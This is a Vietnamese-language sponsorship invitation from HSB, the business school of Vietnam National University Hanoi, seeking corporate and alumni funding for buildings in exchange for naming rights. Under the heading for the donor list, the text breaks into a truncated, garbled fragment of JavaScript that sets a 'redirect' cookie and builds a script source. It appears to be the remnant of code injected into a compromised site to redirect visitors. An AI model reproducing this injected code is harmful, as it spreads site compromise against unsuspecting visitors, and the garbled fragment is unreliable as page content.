Thư mời tài trợ HSB

Kính gửi: Quý công ty, tổ chức, các đơn vị quan tâm cùng các anh chị học viên, cựu học viên

Được thành lập từ năm 1995, Khoa Quản trị và Kinh doanh (Hanoi School of Business and Management – HSB), trực thuộc Đại học Quốc gia Hà Nội (ĐHQGHN), là mô hình nhà trường công lập tự chủ đầu tiên tại Việt Nam chuyên đào tạo về kinh doanh và quản trị liên ngành. Để có được thương hiệu HSB nổi tiếng như ngày hôm nay với hơn 12.000 cựu học viên thành đạt, các thế hệ thầy trò HSB và lịch sử HSB luôn trân trọng và ghi nhớ công lao đóng góp vô giá của nhiều thế hệ giảng viên, học viên và đặc biệt là các doanh nhân và doanh nghiệp đã hiến tặng và tài trợ cho nhà trường trong suốt hơn 21 năm qua. Danh sách các nhà tài trợ đang được cập nhật, lưu trữ tại HSB và công bố trên trang www.hsb.edu.vn

Từ ngày 1/8/2016 HSB chính thức được ĐHQGHN cho phép triển khai lộ trình huy động vốn xã hội theo hình thức hợp tác công tư (Public Private Partnership – PPP) để trước năm 2020 HSB sẽ là mô hình Trường Đại học Quản trị và Kinh doanh tự chủ tiêu biểu tại Việt Nam với cơ sở vật chất hiện đại, đội ngũ giảng viên tài đức và các chương trình đào tạo đặc sắc tại 144 Xuân Thủy hiện tại và Khu đào tạo nội trú HSB tại Khu đô thị ĐHQGHN tại Hòa Lạc.

Ban Chủ nhiệm HSB gửi thư này chính thức mời Quý công ty nghiên cứu, trao đổi và thỏa thuận về hợp đồng tài trợ xây dựng các hạng mục của nhà trường theo khả năng và mong muốn của Quý công ty vì lợi ích của các bên và vì lợi ích lâu dài cho các thế hệ sinh viên và học viên. Tùy theo phạm vi và thỏa thuận trong hợp đồng tài trợ, các giảng đường sẽ mang tên và thương hiệu của các doanh nghiệp, doanh nhân, hoặc học viên tài trợ. Tên của các nhà tài trợ cũng sẽ được lưu danh trong lịch sử HSB, đặc biệt tên và thương hiệu của một số nhà tài trợ sẽ được khắc chìm trên biển hiệu nhà trường tại Hòa Lạc làm bằng khối đá ngọc trắng rộng 3 mét cao 5 mét, nặng khoảng 20 tấn do thầy giáo, Thượng tướng Nguyễn Văn Hưởng tặng.

Mọi thứ sẽ qua đi, chỉ có văn hóa là ở lại. Văn hóa HSB là tinh thần tôn sư trọng đạo, là tinh thần sáng tạo vì cộng đồng, là cam kết đồng hành cùng các cựu học viên và học viên trên hành trình đi tới hạnh phúc và thành công. Chúng ta hãy chung tay và chung sức cùng góp phần xây dựng và quản trị HSB một cách minh bạch và sáng tạo vì sự nghiệp trồng người cao cả.

Thư mời này kèm theo thiết kế và dự toán từng tầng để Quý công ty tham khảo, tên và thương hiệu nhà tài trợ sẽ được gắn trên biển tên giảng đường và biển hiệu nhà trường tại HSB.

Xin trân trọng cảm ơn sự quan tâm, giúp đỡ, tài trợ, hợp tác và đóng góp ý tưởng sáng tạo của quý doanh nghiệp và các bạn trong suốt hành trình xây dựng và phát triển bền vững thương hiệu HSB.

Chi tiết xin vui lòng liên hệ:

Chị Lý Thị Thái Hà, Trưởng phòng Hành chính – Quản trị HSB: 0912.291.174
Em Hoàng Hạnh Nguyên, Trưởng phòng Tuyển sinh HSB: 0983.393.575

 DANH SÁCH CÁC TẬP THỂ VÀ CÁ NHÂN ĐÓNG GÓP XÂY DỰNG HSB 

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’

Trả lời

Email của bạn sẽ không được hiển thị công khai.